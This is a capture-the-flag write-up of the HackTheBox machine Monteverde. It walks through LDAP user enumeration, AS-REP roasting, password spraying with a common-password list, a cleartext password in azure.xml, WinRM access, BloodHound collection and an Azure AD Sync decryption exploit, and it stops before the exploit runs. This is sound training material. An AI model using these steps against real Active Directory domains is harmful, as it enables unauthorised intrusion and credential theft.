HackTheBox — Monteverde

6 min readDec 11, 2021

Hello everyone , I hope you are doing well , in this post I will be sharing my writeup for HTB- Monteverde which was a medium Windows Active Directory machine , smb and ldap were open on this box , we can extract user names from ldap for that either usedwindapsearch or enum4linux-ng which returned us the usernames , then using those usernames as passwords we can brute force on smb using crackmapexec that will give access to smb shares , after that we can find plain text password for user mhope which was in Azure Admins group and since AD Azure was being used there was an exploit which would give us the clear text password for Administrator

NMAP

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version                                                          
|_    bind   
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-11 11:29:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?                                              
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped                                             
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped                                             
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                   
|_http-title: Not Found                                                
9389/tcp  open  mc-nmf        .NET Message Framing                
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
59490/tcp open  msrpc         Microsoft Windows RPC
Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-11T11:32:09
|_  start_date: N/ANSE: Script Post-scanning.

From the nmap scan we can see that port 88 is open which is used by kerberos so this machine is an active directory machine

PORT 139/445 (SMB)

We can try to see if we can login to smb share through unauthenticated user

We were logged in but don’t see any share so moving on , we can try to use enum4linux or windapsearch which can enumerate users from LDAP queries, from the nmap scan we can find the domain name which is MEGABANK.local so put that in /etc/hosts file

This will list service accounts and domain users, let’s try doing it with enum4linux-ng

Now this tool provides us better results so I’ll go with this and note the usernames in a text file

‘

Next I tried to see which users have per-authentication disabled on them so I can get a hash of the user account

python3 GetNPUsers.py -dc-ip 10.10.10.172 MEGABANK.local/arz -usersfile ~/Notes/CTFs/HTB/Medium/Monteverde/users.txt

But we didn’t had any luck doing AS-REP roasting , next we could try some common passwords and brute force it against smb , I created a list of common passwords

12345678
admin
dgalanos
roleary
smorgan
password
password123
Password
Password123
1234567

But it didn’t work , so I tried to use the usernames as a password list

And this found as a valid username and password for smb , so I tried it on winrm to see if I can get a shell and sadly they weren’t valid for winrm

We have read access to azure_uploads but it was emtpy

Foothold

Checking the users$ share we see a azure.xml file in mhope 's directory

On reading the xml we can find a clear text password

So let’s run crackmapexec again to see if we got the correct password

Using evil-winrm we can use that to login over winrm , after logging in we can see that this user is in Azure Admins group

Upload Sharphound.ps1 file which is used for collecting information of AD and then using that info we can enumerate the AD using bloodhound

Invoke-Bloodhound -CollectionMethod All -Domain MEGABANK.local -ZipFileName loot.zip

We can download this archive file by using evil-winrm’s download function in which we have to provide absolute path of the file

Now let’s launch neo4j console and bloodhound , import the json files that you get after extracting the archive

Running any one of the built-in queries to see if data is actually loaded

But here I didn’t find anything that would help me escalate privileges

Privilege Escalation

Now remember that we saw mhope was in Azure admins group so maybe we have to abuse that ,searching of Azure AD related exploit I found an article which would exploit the database and give us the plaintext password

Download the executable for this exploit from here

https://github.com/VbScrub/AdSyncDecrypt/releases

And now uploading the exe and the dll file , in order to run this we need to be in this location C:\Program Files\Microsoft Azure AD Sync\Bin and from here execute the exe (doesn't matter where we upload it)